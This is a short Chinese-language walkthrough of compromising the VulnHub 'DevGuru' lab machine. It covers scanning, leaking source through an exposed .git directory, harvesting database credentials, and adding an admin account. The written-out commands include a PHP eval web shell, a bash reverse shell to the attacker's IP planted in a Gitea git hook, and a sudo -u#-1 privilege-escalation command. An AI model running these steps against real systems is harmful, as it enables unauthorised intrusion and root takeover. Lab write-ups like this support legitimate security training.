vulnhub-devguru(sudo提权)
环境准备:
靶机192.168.0.100
攻击机kali192.168.0.128
演示
使用nmap扫描全端口
首先访问80端口
信息收集发现访问/.git/config存在,使用githack获取源码
访问adminer.php,为一个mysql的登录界面。
查找配置文件,找到mysql登录密码。/config/database.php
登录数据库
查看users表,原先存在frank用户,密码为加密,手动添加账户,之后修改users_group表将id2分到group1组。
目录扫描得到登录界面backend
登录后上传shell
function onStart(){ //蚁剑连接 eval($_POST["pass"]); }
使用蚁剑连接,连接后发现为web权限
上传提权探测脚本,linenum,发现存在备份文件
存在另一个数据库账号密码,使用之前的数据访问界面登录
进入users表,查找网上资料,将别人加密好的密文拿到,123456,替换frank的密码,之后访问8585端,访问/admin登录
点击项目进入,在设置下git hooks中点击update后的修改
将反弹shell命令写入
bash -c "exec bash -i >& /dev/tcp/192.168.0.128/5555 0>&1"
保存后kali启动监听,在项目中任意修改文件并保存,即可拿到shell
首先使用sudo -l查看可以使用sudo提权的命令,在https://gtfobins.github.io/中搜索sqlite3
输入命令后发现提权失败,使用sudo的CVE进行提权
sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'
